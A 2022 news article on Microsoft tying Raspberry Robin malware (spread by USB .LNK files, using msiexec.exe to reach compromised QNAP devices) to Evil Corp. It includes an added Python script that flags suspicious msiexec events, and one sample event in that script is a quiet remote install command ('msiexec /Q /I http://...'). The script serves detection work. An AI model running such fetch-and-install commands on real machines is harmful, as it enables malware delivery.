1 August 2022

Raspberry Robin malware linked to Russian cybercrime syndicate Evil Corp

Microsoft’s cybersecurity team has found a potential connection between the recent Raspberry Robin malware attacks and Evil Corp, an infamous Russia-linked cybercrime syndicate sanctioned by the US government.

In an update to its May write-up on the ransomware-as-a-service (RaaS) industry, Microsoft said that an access broker it tracks as DEV-0206 has been observed using malvertising to trick victims into downloading a loader for additional malware previously linked to Evil Corp, which the tech giant tracks as DEV-0243.

Microsoft said that it discovered the FakeUpdates malware (SocGholish) being delivered via existing Raspberry Robin infections on July 26.

“The DEV-0206-associated FakeUpdates activity on affected systems has since led to follow-on actions resembling DEV-0243 pre-ransomware behavior,” the company noted in the report.

Raspberry Robin (aka QNAP Worm) was first spotted in September 2021 by researchers at cybersecurity firm Red Canary. The malware spreads via infected USB devices in the form of a .LNK file and relies on msiexec.exe to call out to its infrastructure, often compromised QNAP devices. It has also been observed using Tor exit nodes as additional command-and-control (C2) infrastructure. Red Canary noted at the time that questions remained unanswered about the cluster’s later-stage activity and the goals of these campaigns.
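The behaviour described above, msiexec.exe being used to reach out to remote infrastructure, is something a defender can hunt for in process-creation telemetry. The script below is an added example, not code from Microsoft, Red Canary or the article: it triages Sysmon-style process-creation records and flags any msiexec.exe launch whose command line carries a remote package URL, adding context when the install is quiet or the parent is cmd.exe. The event records, paths and host names in it are constructed for illustration.

```python
"""Triage process-creation events for msiexec.exe fetching a remote package.

Added example (not from the article). Event records below are constructed
Sysmon Event ID 1 / Security 4688-style fields, not real telemetry.
"""
import re
from dataclasses import dataclass

# Any http(s) URL in the command line; msiexec accepts a URL as the package path.
URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)
# Quiet-install switches; msiexec accepts both '/' and '-' prefixes, any case.
QUIET_RE = re.compile(r"(?:^|\s)[/-]q(?:uiet|n|b|r|f)?\b", re.IGNORECASE)


@dataclass
class ProcEvent:
    image: str     # full path of the created process
    cmdline: str   # command line as logged
    parent: str    # parent process image


def is_suspicious_msiexec(ev: ProcEvent) -> bool:
    """True when msiexec.exe is started with a remote URL in its command line."""
    if not ev.image.lower().endswith("\\msiexec.exe"):
        return False
    return URL_RE.search(ev.cmdline) is not None


def triage(events):
    """Return a list of (reasons, event) for events worth an analyst's attention."""
    hits = []
    for ev in events:
        if not is_suspicious_msiexec(ev):
            continue
        reasons = ["msiexec with remote package URL"]
        if QUIET_RE.search(ev.cmdline):
            reasons.append("quiet install")
        if ev.parent.lower().endswith("\\cmd.exe"):
            reasons.append("launched from cmd.exe")
        hits.append((", ".join(reasons), ev))
    return hits


# Constructed sample events: one benign local install, one remote quiet
# install launched from cmd.exe, one unrelated tool fetching a URL.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\alice\Downloads\tool.msi"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              "msiexec /Q /I http://host.example.invalid:8080/pkg",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Program Files\Git\bin\git.exe",
              "git clone https://git.example.invalid/repo",
              r"C:\Windows\System32\cmd.exe"),
]


if __name__ == "__main__":
    for reasons, ev in triage(SAMPLE_EVENTS):
        print(f"[{reasons}] parent={ev.parent} cmd={ev.cmdline}")
```

Run it as-is to see only the second constructed event flagged; in practice the records would be read from Sysmon or EDR exports, and the URL match alone is the core signal, with the quiet-install and cmd.exe-parent checks serving as supporting context rather than requirements.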

Last month, Microsoft warned its customers about the Raspberry Robin Windows worm, which had been found in the networks of hundreds of organizations, including those in the technology and manufacturing sectors.
